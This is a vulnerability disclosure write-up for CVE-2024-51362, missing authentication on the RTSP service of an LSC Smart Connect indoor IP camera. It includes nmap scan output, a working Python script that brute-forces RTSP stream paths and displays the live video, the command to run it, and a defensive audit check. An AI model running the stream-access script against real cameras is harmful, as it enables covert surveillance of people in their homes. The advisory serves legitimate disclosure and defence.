CVE-2024-51362 - LSC Smart Connect Indoor IP Camera

Category: Security Research
Severity: High
CVE ID: CVE-2024-51362
Date: May 11, 2024
Vulnerability Summary:
The LSC Smart Connect Indoor IP Camera allows unauthorized access to live camera footage because of improper access control in its RTSP protocol implementation.
Product: LSC Smart Connect Indoor IP Camera
Version: V7.6.32
Type: Incorrect Access Control (CWE-284)
Component: RTSP Protocol, Port 8554 and 80
Impact: Unauthorized access to live video feed
CVSS Score: High (Network accessible without authentication)

$ nmap -sV -sC target

Starting with a comprehensive port scan of the camera to identify available services:

nmap -p- -sV -sC -T4 172.20.10.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 17:55 CEST
Nmap scan report for 172.20.10.2
Host is up (0.033s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
80/tcp   open  rtsp       DoorBird video doorbell rtspd
|_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER
|_http-title: Site doesn't have a title.
|_http-cors: GET POST OPTIONS
835/tcp  open  tcpwrapped
6668/tcp open  irc?
|_irc-info: Unable to open connection
8554/tcp open  rtsp       DoorBird video doorbell rtspd
|_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER
Service Info: Device: webcam

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 922.12 seconds

Open Ports Summary:

$ analyzing RTSP vulnerabilities

The scan reveals two RTSP (Real Time Streaming Protocol) ports - 80 and 8554. Port 8554 is the standard RTSP port, commonly used for streaming video content. This presents an interesting attack surface.

Initial Observations:

$ exploit development

Since RTSP streams can be accessed using media players like VLC, the next step was to develop a Python script to systematically test for accessible video streams without authentication. The approach involves:

import cv2
import argparse
import socket
import time

def bruteforce(ip_address: str, port: int, file: str) -> None:
    rtsp_ip = f"{ip_address}:{port}"

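    try:
        print("Attempting to connect...")
        # Reachability check only: close the probe socket immediately.
        socket.create_connection((ip_address, port), timeout=5).close()
        print("Connection successful!")
    except socket.timeout:
        for remaining_time in range(5, 0, -1):
            print(f"Time out in {remaining_time}")
            time.sleep(1)
        print("Timed out")
        raise SystemExit(1)
    except OSError as exc:
        # Refused or unreachable: exit cleanly instead of a traceback.
        print(f"Connection failed: {exc}")
        raise SystemExit(1)

    cap = None
    with open(file, 'r') as directories:
        for directory in directories:
            # Normalise entries so the URL is rtsp://host:port/<path>.
            directory = directory.strip().lstrip("/")
            candidate = cv2.VideoCapture(f"rtsp://{rtsp_ip}/{directory}")

            if candidate.isOpened():
                print(f"Connection successful with directory: {directory}")
                cap = candidate
                break
            print(f"Connection failed with directory: {directory}")
            candidate.release()

    if cap is None:
        print("No stream could be opened.")
        return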

    while True:
        ret, frame = cap.read()
        if not ret:
            print("Cannot capture frame.")
            break

        cv2.imshow("RTSP Stream", frame)

        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

    cap.release()
    cv2.destroyAllWindows()
    

def main():
    parser = argparse.ArgumentParser(description="Real Time Streaming Protocol (RTSP) Bruteforce directory script")
    parser.add_argument("-ip", "--ip_address", type=str, required=True, help="the IP address")
    parser.add_argument("-p", "--port", type=int, required=True, help="the port")
    parser.add_argument("-f", "--file", type=str, required=True, help="path to rtsp directory list")
    args = parser.parse_args()

    bruteforce(args.ip_address, args.port, args.file)

if __name__ == "__main__":
    main()

$ python3 exploit.py -ip 172.20.10.2 -p 8554 -f rtsp_dirs.txt

Executing the exploit script against the target camera:

Exploitation Result:
The script successfully established an unauthorized connection to the RTSP stream without requiring any authentication credentials. The video feed became immediately accessible.
[Screenshot: RTSP exploit result showing unauthorized camera access]

*Screenshot was updated later, so don't mind the date

$ impact_assessment

Security Impact:

Attack Scenario:

  1. Attacker gains network access (same network segment)
  2. Port scan reveals RTSP services on ports 80 and 8554
  3. Direct connection to RTSP stream without credentials
  4. Real-time video feed access achieved
  5. Continuous surveillance possible

$ vulnerability_details

Technical Details:
Vulnerability Type: Incorrect Access Control (CWE-284)
Root Cause: Missing authentication mechanism in RTSP implementation
Affected Component: RTSP Protocol handler on port 8554
Authentication Mechanism: None implemented
Network Requirements: Layer 3 connectivity to target device
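
To confirm the missing-authentication root cause on a camera you administer, or to verify that a firmware update has closed it, the check below sends a single RTSP DESCRIBE and classifies the reply by status code and `WWW-Authenticate` scheme. It is an added example, not code from the original write-up; the function names, the `/` stream path and the sample responses are constructed assumptions.

```python
import socket

# Constructed sample replies (not captured from the camera).
SAMPLE_OPEN = (b"RTSP/1.0 200 OK\r\nCSeq: 1\r\n"
               b"Content-Type: application/sdp\r\nContent-Length: 0\r\n\r\n")
SAMPLE_DIGEST = (b"RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
                 b'WWW-Authenticate: Digest realm="cam", nonce="constructed"\r\n\r\n')
SAMPLE_BASIC = (b"RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
                b'WWW-Authenticate: Basic realm="cam"\r\n\r\n')

def describe_request(host: str, port: int, path: str = "/", cseq: int = 1) -> bytes:
    """Build a credential-less DESCRIBE for rtsp://host:port/path."""
    url = f"rtsp://{host}:{port}{path}"
    return (f"DESCRIBE {url} RTSP/1.0\r\nCSeq: {cseq}\r\n"
            "Accept: application/sdp\r\n\r\n").encode()

def parse_response(raw: bytes):
    """Return (status_code, headers) where headers maps lowercase name -> values."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("RTSP/") or not parts[1].isdigit():
        raise ValueError(f"not an RTSP status line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return int(parts[1]), headers

def classify(raw: bytes) -> str:
    """'open' means the stream description was served without credentials."""
    status, headers = parse_response(raw)
    if status == 200:
        return "open"
    if status == 401:
        offered = headers.get("www-authenticate", [])
        schemes = {v.split()[0].lower() for v in offered if v.split()}
        return "digest" if "digest" in schemes else "basic-only"
    return "not-found" if status == 404 else f"other-{status}"

def audit(host: str, port: int, path: str = "/", timeout: float = 5.0) -> str:
    """Send one DESCRIBE to a device you administer and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(describe_request(host, port, path))
        return classify(sock.recv(4096))

if __name__ == "__main__":
    for name, raw in [("open", SAMPLE_OPEN), ("digest", SAMPLE_DIGEST), ("basic", SAMPLE_BASIC)]:
        print(name, "->", classify(raw))
```

A `not-found` result only says the requested path does not exist; run `audit()` against the stream path the device documents, on both RTSP ports, before treating the device as protected.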

$ recommendations

Immediate Mitigation:

Long-term Solutions:

Disclosure Information:
This vulnerability demonstrates the critical importance of implementing proper access controls in IoT devices. The LSC Smart Connect Indoor IP Camera's RTSP implementation lacks basic authentication mechanisms, allowing unauthorized users to access live video feeds from any device on the same network segment.